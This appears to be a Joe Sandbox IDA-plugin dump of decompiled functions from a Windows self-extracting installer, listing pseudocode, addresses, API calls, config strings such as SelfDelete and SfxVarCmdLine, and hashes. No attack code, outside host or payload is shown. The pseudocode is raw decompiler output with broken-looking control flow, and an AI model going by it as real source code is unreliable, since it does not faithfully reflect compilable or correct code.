0x00000000
0x0040197f
0x00401941
0x00401941
0x00401941
0x00401944
0x00401947
0x0040194a
0x00000000
0x00401950
0x00401950
0x00401953
0x00000000
0x00401959
0x0040195a
0x00401961
0x00000000
0x00401961
0x00401953
0x0040194a
0x00401919
0x00401919
0x0040191e
0x00000000
0x00401924
0x00401924
0x00000000
0x00401924
0x0040191e
0x004018e2
0x004018e2
0x004018e2
0x004018e5
0x004018e8
0x004018eb
0x004018f6
0x004018f6
0x004018fb
0x00000000
0x00401901
0x00000000
0x00401901
0x004018ed
0x004018ed
0x004018f0
0x00000000
0x00000000
0x00000000
0x00000000
0x004018f0
0x004018eb
0x004018c4
0x004018c4
0x004018c4
0x00000000
0x004018c7
0x004018a6
0x004018a6
0x004018a6
0x00000000
0x004018a9
0x00401868
0x00401868
0x00401868
0x0040186b
0x0040186e
0x00401871
0x00000000
0x00401877
0x00401877
0x0040187a
0x00000000
0x00401880
0x00401880
0x00401885
0x00000000
0x0040188b
0x00000000
0x0040188b
0x00401885
0x0040187a
0x00401871
0x0040184a
0x0040184a
0x0040184a
0x00401984
0x00401984
0x00000000
0x00401984
0x004017f0
0x004017f0
0x004017f0
0x004017f3
0x004017f9
0x00401803
0x0040180d
0x00401824
0x00401827
0x00000000
0x0040182d
0x0040182d
0x00000000
0x0040182d
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00401814
0x00401814
0x00401814
0x00401819
0x00401819
0x00000000
0x00401819
0x004017f9
0x004017ee
0x00401a38
0x00401a38
0x00401a38
0x00401a3a
0x00401a3a
0x00401a3d
0x00401a9f
0x00401a3f
0x00401a45
0x00401a57
0x00401a62
0x00401a67
0x00401a6a
0x00401a6f
0x00401a72
0x00401a7c
0x00401a84
0x00401a89
0x00401a89
0x00401aab
0x00401ab4
0x00401ac8
0x00401ad3
0x00401ad8
0x00401adb
0x00401ae0
0x00401ae3
0x00401aed
0x00401af5
0x00401b04
0x00401b04
0x00401a90
0x00401a93
0x00401a9e
0x00401a9e
0x004017a7
0x004017a7
0x00000000
0x004017a7
0x00000000

APIs

Part of subcall function 00411B60: ??2@YAPAXI@Z.MSVCRT ref: 00411B68

lstrlenW.KERNEL32(00BC2510,?,0041E138,?,?,?,?,?,?,?,?,?,?,?,004066C2,?), ref: 0040177F

Part of subcall function 004030D4: lstrlenW.KERNEL32(0041AA80,?,00BC250E,?,0041E7B8,004017EC), ref: 004030E3
Part of subcall function 004030D4: lstrlenW.KERNEL32(00BC2510,?,0041E7B8,004017EC,?,?,?,?,?,?,?,?,?,?,?,004066C2), ref: 004030E8
Part of subcall function 004030D4: _wcsnicmp.MSVCRT ref: 004030F1

_wtol.MSVCRT(00BC2514,?,?,?,?,?,?,?,?,?,?,?,004066C2,?,00000000), ref: 0040195A
??3@YAXPAX@Z.MSVCRT ref: 00401A24
??3@YAXPAX@Z.MSVCRT ref: 00401A6A
??3@YAXPAX@Z.MSVCRT ref: 00401A93
??3@YAXPAX@Z.MSVCRT ref: 00401A72

Part of subcall function 00405051: ??3@YAXPAX@Z.MSVCRT ref: 004050B8
Part of subcall function 00405051: ??3@YAXPAX@Z.MSVCRT ref: 004050C1
Part of subcall function 00405051: ??3@YAXPAX@Z.MSVCRT ref: 004050C9

Part of subcall function 00411B84: memcpy.MSVCRT ref: 00411BAA

Part of subcall function 00411A27: memcpy.MSVCRT ref: 00411A4A

Part of subcall function 00411BE5: ??2@YAPAXI@Z.MSVCRT ref: 00411C17
Part of subcall function 00411BE5: ??3@YAXPAX@Z.MSVCRT ref: 00411C20
Part of subcall function 00411BE5: memcpy.MSVCRT ref: 00411C38

??3@YAXPAX@Z.MSVCRT ref: 00401ADB
??3@YAXPAX@Z.MSVCRT ref: 00401AE3

Strings

SfxVarCmdLine2, xrefs: 00401AFF
BeginPromptTimeout, xrefs: 0040197F
bpt, xrefs: 0040196B
OverwriteMode, xrefs: 0040184D
SfxVarCmdLine1, xrefs: 00401AA6
GUIFlags, xrefs: 004018A9
GUIMode, xrefs: 0040188B
MiscFlags, xrefs: 004018C7
SelfDelete, xrefs: 00401901

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: ??3@$lstrlenmemcpy$??2@$_wcsnicmp_wtol
String ID: BeginPromptTimeout$GUIFlags$GUIMode$MiscFlags$OverwriteMode$SelfDelete$SfxVarCmdLine1$SfxVarCmdLine2$bpt
API String ID: 2996597252-1537130225
Opcode ID: 60b532fe5fa9b5b3d6588363a788f662964a6b72cee39f2b59c9b3ae800f6c79
Instruction ID: 802da4c3352fe68454c51109ac8192462bb21426cb5da7d8071438425f36007c
Opcode Fuzzy Hash: 60b532fe5fa9b5b3d6588363a788f662964a6b72cee39f2b59c9b3ae800f6c79
Instruction Fuzzy Hash: 2FA19231A012018ADB28EB52C5555FEB7B5AF41344B64C43FE842B32F5EB3CAA85C75E

Uniqueness

Uniqueness Score: -1.00%

Function 0040941A, Relevance: 28.6, APIs: 19, Instructions: 149
windowcomtimeCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E0040941A(void* __edx, void* __eflags) {
				int _v4;
				char _v8;
				void* __ecx;
				intOrPtr _t30;
				intOrPtr* _t33;
				signed int _t44;
				struct HMENU__* _t49;
				signed int _t53;
				intOrPtr _t62;
				void* _t71;
				intOrPtr _t74;
				signed int _t83;

				_t71 = __edx;
				_t74 = _t62;
				 *0x41e8c4 =  *(_t74 + 4);
				 *0x41e8c8 = _t74;
				E00407ABB(_t62, 0x4b8, 1);
				SendMessageW(GetDlgItem( *(_t74 + 4), 0x4b8), 0x401, 0, 0x75300000);
				_t30 =  *0x41e750; // 0x0
				if(_t30 != 0) {
					E00407EBB(_t74, _t71, 0x4b4, _t30);
					E00407A0F(GetDlgItem( *(_t74 + 4), 0x4b4),  *0x41e750);
				}
				if(( *0x41e44c & 0x00000004) != 0) {
					E00407ABB(_t74, 0x4b5, 1);
					_t53 = GetWindowLongW(GetDlgItem( *(_t74 + 4), 0x4b5), 0xfffffff0);
					SetWindowLongW(GetDlgItem( *(_t74 + 4), 0x4b5), 0xfffffff0, _t53 | 0x00000001);
					E00408287(_t74);
				}
				if( *0x41e770 == 1) {
					E00407ABB(_t74, 0x4b4, 0);
					_t49 = GetSystemMenu( *(_t74 + 4), 0);
					if(_t49 != 0) {
						EnableMenuItem(_t49, 0xf060, 1);
					}
				}
				SetFocus(GetDlgItem( *(_t74 + 4), 0x4b4));
				_t83 =  *0x41e8d4; // 0x0
				if(_t83 != 0) {
					 *((intOrPtr*)(_t74 + 0x68)) = 0;
					 *((intOrPtr*)(_t74 + 0x6c)) = 0;
					 *((intOrPtr*)(_t74 + 0x60)) = 0x64;
					 *((intOrPtr*)(_t74 + 0x64)) = 0;
					_t44 =  *0x41e8d4; // 0x0
					SetTimer( *(_t74 + 4), 1, _t44 * 0xa, 0);
				}
				_t33 = _t74 + 0x70;
				 *_t33 = 0;
				if(( *0x41e44c & 0x00002000) == 0) {
					__imp__CoCreateInstance(0x41c84c, 0, 1, 0x41bfe4, _t33);
					if(_t33 == 0) {
						E0040826E(_t74, 1);
					}
				}
				if( *0x41e770 == 1 && IsWindow(GetDlgItem( *(_t74 + 4), 2)) != 0) {
					EnableWindow(GetDlgItem( *(_t74 + 4), 2), 0);
				}
				_t89 =  *0x41e44c & 0x00000004;
				if(( *0x41e44c & 0x00000004) == 0) {
					ShowWindow(GetDlgItem( *(_t74 + 4), 0x4b5), 0);
				}
				_v8 = 0;
				_v4 = 0;
				E00408946(_t74, _t71, _t89,  &_v8);
				return E00408F3F(_t71);
			}

0x0040941a
0x00409420
0x0040942d
0x00409432
0x00409438
0x00409456
0x0040945c
0x00409468
0x0040946e
0x00409482
0x00409482
0x00409493
0x0040949a
0x004094a8
0x004094bb
0x004094c3
0x004094c3
0x004094cf
0x004094d6
0x004094e1
0x004094e9
0x004094f3
0x004094f3
0x004094e9
0x00409500
0x00409508
0x0040950e
0x00409510
0x00409513
0x00409516
0x0040951d
0x00409520
0x0040952f
0x0040952f
0x00409535
0x00409538
0x00409544
0x00409554
0x0040955c
0x00409562
0x00409562
0x0040955c
0x0040956e
0x0040958b
0x0040958b
0x00409591
0x00409598
0x004095a2
0x004095a2
0x004095af
0x004095b3
0x004095b7
0x004095c9

APIs

Part of subcall function 00407ABB: GetDlgItem.USER32 ref: 00407AC8
Part of subcall function 00407ABB: ShowWindow.USER32(00000000,?), ref: 00407ADF

GetDlgItem.USER32 ref: 00409447
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00409456
GetDlgItem.USER32 ref: 0040947D

Part of subcall function 00407A0F: SetWindowTextW.USER32(00000000,00000000), ref: 00407A17

Part of subcall function 00408946: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0040897E
Part of subcall function 00408946: GetDlgItem.USER32 ref: 004089A2
Part of subcall function 00408946: SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 004089AF
Part of subcall function 00408946: wsprintfW.USER32 ref: 004089CF
Part of subcall function 00408946: GetDlgItem.USER32 ref: 004089ED
Part of subcall function 00408946: ??3@YAXPAX@Z.MSVCRT ref: 00408A7B

Part of subcall function 00408F3F: GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,0040932F), ref: 00408F69
Part of subcall function 00408F3F: LoadIconW.USER32(00000000), ref: 00408F6C
Part of subcall function 00408F3F: GetSystemMetrics.USER32 ref: 00408F80
Part of subcall function 00408F3F: GetSystemMetrics.USER32 ref: 00408F85
Part of subcall function 00408F3F: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,0040932F), ref: 00408F8E
Part of subcall function 00408F3F: LoadImageW.USER32 ref: 00408F91
Part of subcall function 00408F3F: SendMessageW.USER32(?,00000080,00000001,?), ref: 00408FB1
Part of subcall function 00408F3F: SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00408FBA
Part of subcall function 00408F3F: GetDlgItem.USER32 ref: 00408FD7
Part of subcall function 00408F3F: GetDlgItem.USER32 ref: 00408FE1
Part of subcall function 00408F3F: GetWindowLongW.USER32(?,000000F0), ref: 00408FED
Part of subcall function 00408F3F: SetWindowLongW.USER32 ref: 00408FFC
Part of subcall function 00408F3F: GetDlgItem.USER32 ref: 0040900A
Part of subcall function 00408F3F: GetDlgItem.USER32 ref: 00409018
Part of subcall function 00408F3F: GetWindowLongW.USER32(000000F0,000000F0), ref: 00409024
Part of subcall function 00408F3F: SetWindowLongW.USER32 ref: 00409033
Part of subcall function 00408F3F: GetDlgItem.USER32 ref: 00409040

GetDlgItem.USER32 ref: 004094A3
GetWindowLongW.USER32(00000000,000000F0), ref: 004094A8
GetDlgItem.USER32 ref: 004094B8
SetWindowLongW.USER32 ref: 004094BB
GetSystemMenu.USER32(?,00000000,000004B4,00000000), ref: 004094E1
EnableMenuItem.USER32 ref: 004094F3
GetDlgItem.USER32 ref: 004094FD
SetFocus.USER32(00000000), ref: 00409500
SetTimer.USER32(?,00000001,00000000,00000000), ref: 0040952F
CoCreateInstance.OLE32(0041C84C,00000000,00000001,0041BFE4,?), ref: 00409554
GetDlgItem.USER32 ref: 00409575
IsWindow.USER32(00000000), ref: 00409578
GetDlgItem.USER32 ref: 00409588
EnableWindow.USER32(00000000), ref: 0040958B
GetDlgItem.USER32 ref: 0040959F
ShowWindow.USER32(00000000), ref: 004095A2

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: Item$Window$Long$MessageSend$System$EnableHandleLoadMenuMetricsModuleShow$??3@CreateFocusIconImageInstanceTextTimerUnothrow_t@std@@@__ehfuncinfo$??2@wsprintf
String ID:
API String ID: 957878288-0
Opcode ID: 7faac37edcd208d7f3d635246ce9092851c04d018622aa74b3308d040a587b32
Instruction ID: 91ef2c87c7f5044bd2a8179c9000c8a4a1c30ad634a6280c3a66f42eddf6a5f2
Opcode Fuzzy Hash: 7faac37edcd208d7f3d635246ce9092851c04d018622aa74b3308d040a587b32
Instruction Fuzzy Hash: 794175B4604708BBEA216F26DD49F5B7B9DEB40B04F04843DF955A22E1CB79AC10CB2D

Uniqueness

Uniqueness Score: -1.00%

Function 00405112, Relevance: 28.3, APIs: 14, Strings: 2, Instructions: 256
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E00405112(intOrPtr* __ecx, intOrPtr __edx, void* __eflags) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				char _v28;
				signed int _v36;
				char _v40;
				char _v52;
				char _v64;
				char _v76;
				char _v88;
				wchar_t* _v100;
				void* __edi;
				void* _t76;
				void* _t86;
				WCHAR* _t88;
				intOrPtr _t89;
				WCHAR* _t90;
				intOrPtr _t92;
				WCHAR* _t96;
				WCHAR* _t99;
				intOrPtr _t100;
				WCHAR* _t104;
				WCHAR* _t105;
				WCHAR* _t110;
				WCHAR* _t111;
				char _t113;
				intOrPtr _t115;
				signed int _t117;
				WCHAR* _t122;
				char _t133;
				signed int _t140;
				char _t142;
				WCHAR* _t154;
				signed int _t162;
				intOrPtr* _t165;
				void* _t167;
				signed int _t168;
				WCHAR* _t169;
				WCHAR** _t170;
				WCHAR* _t171;
				void* _t173;

				_v8 = _v8 & 0x00000000;
				_t165 = __ecx;
				_v12 = __edx;
				E00411743(_t76,  &_v40);
				L49:
				while(E00403339( &_v8, _t165) != 0) {
					while(1) {
						_v20 = _t133;
						__eflags = E00403315(_t133);
						if(__eflags != 0) {
							break;
						}
						__eflags = _t133 - 0x3d;
						if(__eflags == 0) {
							break;
						}
						E00403087( &_v52, _v20);
						_t122 =  &(_t122[0]);
						__eflags = _t122;
						_t133 =  *((intOrPtr*)(_t167 + _t122));
					}
					E00411C48( &_v100, E0040442E( &_v64,  &_v52, __eflags, 0xfde9));
					_push(_v64);
					L004191B0();
					_push(_v52);
					L004191B0();
					__eflags = _t122;
					if(_t122 == 0) {
						_t162 = _v8;
						L53:
						_t86 = E004045C9(_t165, _t162, _v12);
						_push(_v88);
						L004191B0();
						_push(_v100);
						L004191B0();
						_push(_v40);
						L004191B0();
						return _t86;
					}
					_v8 = _t122 + _v8;
					_t163 = _t165;
					_t88 = E00403339( &_v8, _t165);
					__eflags = _t88;
					if(_t88 == 0) {
						L52:
						_t162 = _v16;
						goto L53;
					}
					_t89 =  *_t165;
					_t140 = _v8;
					__eflags =  *((char*)(_t140 + _t89)) - 0x3d;
					if( *((char*)(_t140 + _t89)) != 0x3d) {
						goto L52;
					}
					_v8 = _v8 + 1;
					_t90 = E00403339( &_v8, _t163);
					__eflags = _t90;
					if(_t90 == 0) {
						goto L52;
					}
					_t168 = _v8;
					_t92 =  *((intOrPtr*)(_t168 +  *_t165));
					__eflags = _t92 - 0x22;
					if(_t92 == 0x22) {
						_t169 = _t168 + 1;
						_v36 = _v36 & 0x00000000;
						_v8 = _t169;
						 *_v40 = 0;
						while(1) {
							L29:
							_t96 = strncmp( *_t165 + _t169, "{\\rtf", 5);
							_t173 = _t173 + 0xc;
							__eflags = _t96;
							if(_t96 != 0) {
								goto L28;
							} else {
								break;
							}
							while(1) {
								L28:
								_t99 = strncmp( *_t165 + _t169, "{\\rtf", 5);
								_t173 = _t173 + 0xc;
								__eflags = _t99;
								if(_t99 == 0) {
									goto L29;
								}
								__eflags = _t169 -  *((intOrPtr*)(_t165 + 4));
								if(_t169 >=  *((intOrPtr*)(_t165 + 4))) {
									goto L52;
								}
								_t100 =  *_t165;
								_t142 =  *((intOrPtr*)(_t100 + _t169));
								_t169 =  &(_t169[0]);
								_v28 = _t142;
								_v8 = _t169;
								__eflags = _t142 - 0x22;
								if(__eflags == 0) {
									L39:
									_t164 =  &_v40;
									E00411C48( &_v88, E0040442E( &_v76,  &_v40, __eflags, 0xfde9));
									_push(_v76);
									L004191B0();
									E00404666( &_v88, _t165, __eflags);
									_t104 = lstrcmpW(_v100, L"SetEnvironment");
									__eflags = _t104;
									if(_t104 != 0) {
										L41:
										__eflags =  *0x41e110;
										_t170 = 0x41e110;
										if( *0x41e110 == 0) {
											L45:
											_t164 = 0;
											_t105 = E00404FF9(_v100, 0);
											__eflags = _t105;
											if(_t105 == 0) {
												L47:
												E00402963( &_v100, 0x41e7a0, _t164,  &_v100);
												L48:
												_push(_v88);
												L004191B0();
												_push(_v100);
												L004191B0();
												goto L49;
											}
											_t64 =  &(_t105[6]); // 0xc
											E00411BE5(_t64, _v88);
											goto L48;
										} else {
											goto L42;
										}
										while(1) {
											L42:
											_t110 = wcsncmp(_v100,  *_t170, lstrlenW( *_t170));
											_t173 = _t173 + 0xc;
											__eflags = _t110;
											if(_t110 == 0) {
												break;
											}
											_t170 =  &(_t170[1]);
											__eflags =  *_t170;
											if( *_t170 != 0) {
												continue;
											}
											break;
										}
										__eflags =  *_t170;
										if( *_t170 != 0) {
											goto L47;
										}
										goto L45;
									}
									_t164 = 0x3d;
									_t111 = E0041158D(_v88,  &_v40);
									__eflags = _t111;
									if(_t111 <= 0) {
										goto L52;
									}
									goto L41;
								}
								__eflags = _t142 - 0x5c;
								if(_t142 != 0x5c) {
									_push(_v28);
									L26:
									_t153 =  &_v40;
									L27:
									E00403087(_t153);
									continue;
								}
								_t113 =  *((intOrPtr*)(_t100 + _t169));
								_t169 =  &(_t169[0]);
								_v24 = _t113;
								_v8 = _t169;
								__eflags = _t113 - 0x22;
								if(_t113 == 0x22) {
									_push(0x22);
									goto L26;
								}
								__eflags = _t113 - _t142;
								if(_t113 == _t142) {
									_push(0x5c);
									goto L26;
								}
								__eflags = _t113 - 0x6e;
								if(_t113 == 0x6e) {
									_push(0xa);
									goto L26;
								}
								_t153 =  &_v40;
								__eflags = _t113 - 0x74;
								if(_t113 == 0x74) {
									_push(9);
									goto L27;
								}
								E00403087( &_v40, 0x5c);
								_push(_v24);
								goto L26;
							}
						}
						while(1) {
							_t115 =  *_t165;
							_t154 =  *(_t115 + _t169);
							__eflags = _t154;
							if(_t154 == 0) {
								break;
							}
							__eflags = _t154 - 0x22;
							if(_t154 == 0x22) {
								break;
							}
							__eflags = _t154 - 0x5c;
							if(_t154 == 0x5c) {
								__eflags =  *((char*)(_t115 +  &(_t169[0]))) - 0x22;
								if( *((char*)(_t115 +  &(_t169[0]))) == 0x22) {
									_t169 =  &(_t169[0]);
									__eflags = _t169;
								}
							}
							_t117 =  *(_t115 + _t169) & 0x000000ff;
							_t169 =  &(_t169[0]);
							__eflags = _t169;
							_v8 = _t169;
							E00403087( &_v40, _t117);
						}
						__eflags =  *((char*)(_t169 +  *_t165));
						if(__eflags != 0) {
							_t171 =  &(_t169[0]);
							__eflags = _t171;
							_v8 = _t171;
						}
						goto L39;
					}
					__eflags = _t92 - 0x2d;
					if(_t92 != 0x2d) {
						goto L52;
					}
					E004050D6(_v100);
					_v8 = _t168 + 1;
					goto L48;
				}
				_push(_v40);
				L004191B0();
				return 1;
			}

0x00405118
0x0040511f
0x00405124
0x00405127
0x00000000
0x004053ac
0x0040516d
0x0040516f
0x00405177
0x00405179
0x00000000
0x00000000
0x00405159
0x0040515c
0x00000000
0x00000000
0x00405164
0x00405169
0x00405169
0x0040516a
0x0040516a
0x0040518f
0x00405194
0x00405197
0x0040519c
0x0040519f
0x004051a6
0x004051a8
0x004053cb
0x004053d3
0x004053d8
0x004053dd
0x004053e2
0x004053e7
0x004053ea
0x004053ef
0x004053f2
0x00000000
0x004053f9
0x004051ae
0x004051b4
0x004051b6
0x004051bb
0x004051bd
0x004053d0
0x004053d0
0x00000000
0x004053d0
0x004051c3
0x004051c5
0x004051c8
0x004051cc
0x00000000
0x00000000
0x004051d2
0x004051d8
0x004051dd
0x004051df
0x00000000
0x00000000
0x004051e7
0x004051ea
0x004051ed
0x004051ef
0x00405213
0x00405214
0x00405218
0x0040521b
0x0040529c
0x0040529c
0x004052a8
0x004052aa
0x004052ad
0x004052af
0x00000000
0x00000000
0x00000000
0x00000000
0x00405287
0x00405287
0x00405293
0x00405295
0x00405298
0x0040529a
0x00000000
0x00000000
0x00405220
0x00405223
0x00000000
0x00000000
0x00405229
0x0040522b
0x0040522e
0x0040522f
0x00405232
0x00405235
0x00405238
0x004052eb
0x004052f0
0x004052ff
0x00405304
0x00405307
0x00405310
0x0040531d
0x00405323
0x00405325
0x0040533a
0x0040533a
0x00405341
0x00405346
0x00405371
0x00405374
0x00405376
0x0040537b
0x0040537d
0x0040538c
0x00405395
0x0040539a
0x0040539a
0x0040539d
0x004053a2
0x004053a5
0x00000000
0x004053ab
0x00405382
0x00405385
0x00000000
0x00000000
0x00000000
0x00000000
0x00405348
0x00405348
0x00405357
0x0040535d
0x00405360
0x00405362
0x00000000
0x00000000
0x00405364
0x00405367
0x0040536a
0x00000000
0x00000000
0x00000000
0x0040536a
0x0040536c
0x0040536f
0x00000000
0x00000000
0x00000000
0x0040536f
0x0040532c
0x0040532d
0x00405332
0x00405334
0x00000000
0x00000000
0x00000000
0x00405334
0x0040523e
0x00405241
0x0040527c
0x0040527f
0x0040527f
0x00405282
0x00405282
0x00000000
0x00405282
0x00405243
0x00405246
0x00405247
0x0040524a
0x0040524d
0x0040524f
0x00405278
0x00000000
0x00405278
0x00405251
0x00405253
0x00405274
0x00000000
0x00405274
0x00405255
0x00405257
0x00405270
0x00000000
0x00405270
0x00405259
0x0040525c
0x0040525e
0x0040526c
0x00000000
0x0040526c
0x00405262
0x00405267
0x00000000
0x00405267
0x00405287
0x004052d6
0x004052d6
0x004052d8
0x004052db
0x004052dd
0x00000000
0x00000000
0x004052b3
0x004052b6
0x00000000
0x00000000
0x004052b8
0x004052bb
0x004052bd
0x004052c2
0x004052c4
0x004052c4
0x004052c4
0x004052c2
0x004052c5
0x004052c9
0x004052c9
0x004052ce
0x004052d1
0x004052d1
0x004052e1
0x004052e5
0x004052e7
0x004052e7
0x004052e8
0x004052e8
0x00000000
0x004052e5
0x004051f1
0x004051f3
0x00000000
0x00000000
0x004051fc
0x00405202
0x00000000
0x00405202
0x004053be
0x004053c1
0x00000000

APIs

Part of subcall function 00411743: ??2@YAPAXI@Z.MSVCRT ref: 0041174B

??3@YAXPAX@Z.MSVCRT ref: 00405197
??3@YAXPAX@Z.MSVCRT ref: 0040519F
??3@YAXPAX@Z.MSVCRT ref: 0040539D
??3@YAXPAX@Z.MSVCRT ref: 004053A5
??3@YAXPAX@Z.MSVCRT ref: 004053C1
??3@YAXPAX@Z.MSVCRT ref: 004053E2
??3@YAXPAX@Z.MSVCRT ref: 004053EA
??3@YAXPAX@Z.MSVCRT ref: 004053F2

Strings

{\rtf, xrefs: 0040528D, 004052A2
SetEnvironment, xrefs: 00405315

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: ??3@$??2@
String ID: SetEnvironment${\rtf
API String ID: 4113381792-318139784
Opcode ID: 0e9b30d454d381ff44a26bf80db0083171be6676ef64e56021da3b2ac69a4e51
Instruction ID: 77d8a904bf1d7ff1cd0baf4dd30aa615c8c5e0bf9e93a58920d719d6b3547280
Opcode Fuzzy Hash: 0e9b30d454d381ff44a26bf80db0083171be6676ef64e56021da3b2ac69a4e51
Instruction Fuzzy Hash: 1C91BC30900609ABDB15DBA1C855BEFBBB1EF14304F2400ABE942772D2DB785E45DF99

Uniqueness

Uniqueness Score: -1.00%

Function 00403C19, Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 121
windowcommemoryCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E00403C19(struct HWND__* __ecx) {
				int _v8;
				long _v12;
				void* _v16;
				struct HWND__* _v20;
				void* _v24;
				int _v40;
				int _v44;
				void _v48;
				char _v112;
				char* _t41;
				intOrPtr* _t44;
				intOrPtr* _t47;
				intOrPtr* _t49;
				void* _t53;
				void* _t57;
				void* _t67;
				struct HWND__* _t68;

				_t68 = __ecx;
				_v20 = __ecx;
				if(GetClassNameA(__ecx,  &_v112, 0x40) == 0 || lstrcmpiA( &_v112, "STATIC") != 0 || (GetWindowLongW(_t68, 0xfffffff0) & 0x0000000e) == 0) {
					L13:
					return 0;
				} else {
					_t57 = E004039F0("IMAGES", GetMenu(_t68),  &_v12);
					if(_t57 == 0 || _v12 < 0x10) {
						goto L13;
					} else {
						_t67 = GlobalAlloc(0x40, _v12);
						if(_t67 == 0) {
							goto L13;
						}
						memcpy(_t67, _t57, _v12);
						__imp__CoInitialize(0);
						_t41 =  &_v16;
						__imp__CreateStreamOnHGlobal(_t67, 0, _t41);
						if(_t41 != 0 || _v16 == 0) {
							GlobalFree(_t67);
							goto L13;
						} else {
							__imp__#418(_v16, 0, 0, 0x41c82c,  &_v24);
							_t44 = _v16;
							 *((intOrPtr*)( *_t44 + 8))(_t44);
							GlobalFree(_t67);
							_t47 = _v24;
							if(_t47 == 0) {
								goto L13;
							}
							_v8 = 0;
							 *((intOrPtr*)( *_t47 + 0xc))(_t47,  &_v8);
							_t62 = _v8;
							if(_v8 != 0) {
								_t53 = E00403AD9(_t62);
								_v8 = _t53;
								GetObjectW(_t53, 0x18,  &_v48);
								SetWindowPos(_v20, 0, 0, 0, _v44, _v40, 6);
								SendMessageW(_v20, 0x172, 0, _v8);
							}
							_t49 = _v24;
							 *((intOrPtr*)( *_t49 + 8))(_t49);
							return 1;
						}
					}
				}
			}

0x00403c27
0x00403c2b
0x00403c36
0x00403d66
0x00000000
0x00403c64
0x00403c7b
0x00403c81
0x00000000
0x00403c91
0x00403c9c
0x00403ca0
0x00000000
0x00000000
0x00403cab
0x00403cb4
0x00403cba
0x00403cc0
0x00403cc8
0x00403d60
0x00000000
0x00403cd7
0x00403ce5
0x00403ceb
0x00403cf1
0x00403cf5
0x00403cfb
0x00403d00
0x00000000
0x00000000
0x00403d06
0x00403d0c
0x00403d0f
0x00403d14
0x00403d16
0x00403d22
0x00403d25
0x00403d39
0x00403d4b
0x00403d4b
0x00403d51
0x00403d57
0x00000000
0x00403d5c
0x00403cc8
0x00403c81

APIs

GetClassNameA.USER32(?,?,00000040), ref: 00403C2E
lstrcmpiA.KERNEL32(?,STATIC,?,?,00000040), ref: 00403C45
GetWindowLongW.USER32(?,000000F0), ref: 00403C56
GetMenu.USER32 ref: 00403C69

Part of subcall function 004039F0: GetModuleHandleW.KERNEL32(00000000), ref: 00403A01
Part of subcall function 004039F0: FindResourceExA.KERNEL32(00000000,?,?), ref: 00403A1F
Part of subcall function 004039F0: FindResourceExA.KERNEL32(?,?,?,00000409), ref: 00403A36
Part of subcall function 004039F0: SizeofResource.KERNEL32(?,00000000), ref: 00403A49
Part of subcall function 004039F0: LoadResource.KERNEL32(?,00000000), ref: 00403A55
Part of subcall function 004039F0: LockResource.KERNEL32(00000000), ref: 00403A60

GlobalAlloc.KERNEL32(00000040,00000010,?,?,000000F0,?,?,00000040), ref: 00403C96
memcpy.MSVCRT ref: 00403CAB
CoInitialize.OLE32(00000000), ref: 00403CB4
CreateStreamOnHGlobal.OLE32(00000000,00000000,?), ref: 00403CC0
OleLoadPicture.OLEAUT32(?,00000000,00000000,0041C82C,?), ref: 00403CE5
GlobalFree.KERNEL32 ref: 00403CF5

Part of subcall function 00403AD9: GetWindowDC.USER32(00000000), ref: 00403AE8
Part of subcall function 00403AD9: GetDeviceCaps.GDI32(00000000,00000058), ref: 00403AF4
Part of subcall function 00403AD9: MulDiv.KERNEL32(00000000,00000064,00000060), ref: 00403B0D
Part of subcall function 00403AD9: GetObjectW.GDI32(?,00000018,?), ref: 00403B44
Part of subcall function 00403AD9: MulDiv.KERNEL32(?,00000003,00000002), ref: 00403B51
Part of subcall function 00403AD9: MulDiv.KERNEL32(?,00000003,00000002), ref: 00403B5D
Part of subcall function 00403AD9: CreateCompatibleDC.GDI32(?), ref: 00403B6B
Part of subcall function 00403AD9: CreateCompatibleDC.GDI32(?), ref: 00403B73
Part of subcall function 00403AD9: SelectObject.GDI32(00000002,?), ref: 00403B83
Part of subcall function 00403AD9: CreateCompatibleBitmap.GDI32(?,?,?), ref: 00403B91
Part of subcall function 00403AD9: SelectObject.GDI32(00000000,00000000), ref: 00403B99
Part of subcall function 00403AD9: SetStretchBltMode.GDI32(00000000,00000004), ref: 00403BA1
Part of subcall function 00403AD9: StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000002,00000000,00000000,?,?,00CC0020), ref: 00403BC0
